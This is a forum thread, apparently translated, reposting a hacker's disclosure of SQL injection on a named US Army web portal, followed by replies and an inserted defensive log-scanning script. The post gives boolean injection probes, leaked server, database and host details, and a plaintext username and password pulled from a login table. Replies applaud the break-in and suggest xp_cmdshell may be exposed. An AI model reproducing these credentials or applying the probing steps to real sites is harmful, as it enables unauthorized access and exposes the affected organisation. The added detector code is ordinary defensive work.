Army.mil
The United States Army is the branch of the United States Military responsible for land-based military operations. It is the largest and oldest established branch of the U.S. military and is one of seven uniformed services. The modern Army has its roots in the Continental Army which was formed on 14 June 1775, before the establishment of the United States, to meet the demands of the American Revolutionary War. Congress created the United States Army on 14 June 1784 after the end of the war to replace the disbanded Continental Army. The Army considers itself to be descended from the Continental Army and thus dates its inception from the origins of that force.
Vulnerable link: http://onestop.army.mil/
This website is vulnerable to MSSQL Injection. With this vulnerability I can see / extract all things from databases.
Testing:
and 1=1-- (True)
(http://i49.tinypic.com/vdzrsx.jpg)
and 1=2-- (False)
(http://i47.tinypic.com/xm4mk0.jpg)
OK, in this picture we can see all the main information about the web server.
(http://i46.tinypic.com/105ds02.jpg)
Main information:
#Version: Microsoft SQL Server 2000 - 8.00.2282 (Intel X86) Dec 30 2008 02:22:41 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2
#User: Dynatouch
#Database: AHOS
#Host Name: AHSGSVDAHQIT130
All databases:
We can access information_schema, so let's see the tables from principal database "AHOS"
(http://i49.tinypic.com/1440il4.jpg)
Now, here are some interesting tables, like mgr_login_passwords.
(http://i45.tinypic.com/23pvk6.jpg)
Here I found user:password columns, with:
#Username: Dynatouch
#Password: AHOS
wtf!
That's all! Bye, TinKode...
I'll leave the link: http://tinkode.baywords.com/index.php/2010/01/army-mil-full-disclosure/
The passwords in plain text! ;-)
You should also look at the other topics they have on that blog; the US Army is not the only one that comes off badly, there are posts on Kaspersky, Yahoo, ESET Nod, Apple, NASA :o
Regards
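Added example, not part of the original post or of the blog entry it quotes: a defender-side check that scans web access logs for the paired `and 1=1--` / `and 1=2--` requests shown under "Testing" above, and reports each client that sent both a true and a false comparison to the same parameter. The log layout, the path `/page.asp`, the parameter names and the IP addresses are constructed assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Constructed sample log, simplified to "client method url status" per line.
SAMPLE_LOG = """\
203.0.113.7 GET /page.asp?id=12 200
203.0.113.7 GET /page.asp?id=12%20and%201=1-- 200
203.0.113.7 GET /page.asp?id=12+AND+1%3D2-- 200
198.51.100.4 GET /search.asp?q=rock+and+roll 200
198.51.100.9 GET /page.asp?id=7%20and%205=5-- 200
198.51.100.9 GET /page.asp?id=7 200
"""

# "and <int>=<int>" followed by a SQL line comment, appended to a parameter value.
PROBE = re.compile(r"\band\s+(\d+)\s*=\s*(\d+)\s*--", re.IGNORECASE)


def find_boolean_probe_pairs(log_text):
    """Return sorted (client, path, param) keys that received BOTH a
    true comparison (1=1) and a false one (1=2)."""
    outcomes = defaultdict(set)
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) < 3:
            continue  # not a request line in the assumed layout
        client, _method, url = fields[:3]
        target = urlsplit(url)
        # parse_qsl percent-decodes values and turns '+' into spaces,
        # so encoded and mixed-case variants are compared in one form.
        for param, value in parse_qsl(target.query, keep_blank_values=True):
            match = PROBE.search(value)
            if match:
                is_true = int(match.group(1)) == int(match.group(2))
                outcomes[(client, target.path, param)].add(is_true)
    # A lone tautology can be noise; a true/false pair against the same
    # parameter is the differential test described in the post.
    return sorted(key for key, seen in outcomes.items() if seen == {True, False})


if __name__ == "__main__":
    for client, path, param in find_boolean_probe_pairs(SAMPLE_LOG):
        print(f"boolean SQLi probe pair: client={client} path={path} param={param}")
```

A hit means the parameter was being tested, not that it is injectable; confirm by checking whether the two responses differed in size or content, and review how that parameter reaches the database.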
Haha, true, the page looks very interesting ;-); and from what can be seen, the vulnerable site uses SQL Server 2000, so considering that they are vulnerable to injections, maybe xp_cmdshell is enabled xD
One question: looking at that paper, if I tried an injection using that example on the page, could I face legal repercussions?
Regards
The websites with the best reputation are almost always the most vulnerable, even though they are the ones that spend the most money. Maybe instead of spending so much money on building the site they should set aside some of it to audit the system for flaws.
Quote from: WHK on 14 January 2010, 21:01 PM
The websites with the best reputation are almost always the most vulnerable, even though they are the ones that spend the most money. Maybe instead of spending so much money on building the site they should set aside some of it to audit the system for flaws.
Wow, I had no idea; it's true that sometimes they spend more on making it look pretty and so on...
It will be a matter of looking into it...
Regards
The bigger a website is, the more likely it is to have bugs
Quote from: HuSSe19 on 12 March 2010, 08:01 AM
The bigger a website is, the more likely it is to have bugs
Exactly, I'm with you... that is, the more code, the higher the probability of error ;D